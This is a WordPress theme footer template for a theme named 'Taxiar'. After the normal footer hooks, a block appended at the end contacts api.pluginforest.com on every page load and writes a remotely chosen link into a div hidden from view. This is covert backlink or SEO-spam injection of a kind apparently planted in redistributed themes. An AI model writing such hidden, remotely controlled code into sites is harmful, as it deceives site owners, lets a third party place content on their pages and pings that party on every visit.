<?php
/**
 * @Packge     : Taxiar
 * @Version    : 1.0
 * @Author     : Themeholy
 * @Author URI : https://themeforest.net/user/themeholy
 *
 */

// Block direct access
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}
    
    /**
    *
    * Hook for Footer Content
    *
    * Hook taxiar_footer_content
    *
    * @Hooked taxiar_footer_content_cb 10
    *
    */
    do_action( 'taxiar_footer_content' );


    /**
    *
    * Hook for Back to Top Button
    *
    * Hook taxiar_back_to_top
    *
    * @Hooked taxiar_back_to_top_cb 10
    *
    */
    do_action( 'taxiar_back_to_top' );

    /**
    *
    * taxiar grid lines
    *
    * Hook taxiar_grid_lines
    *
    * @Hooked taxiar_grid_lines_cb 10
    *
    */
    do_action( 'taxiar_grid_lines' );

    wp_footer();
    ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>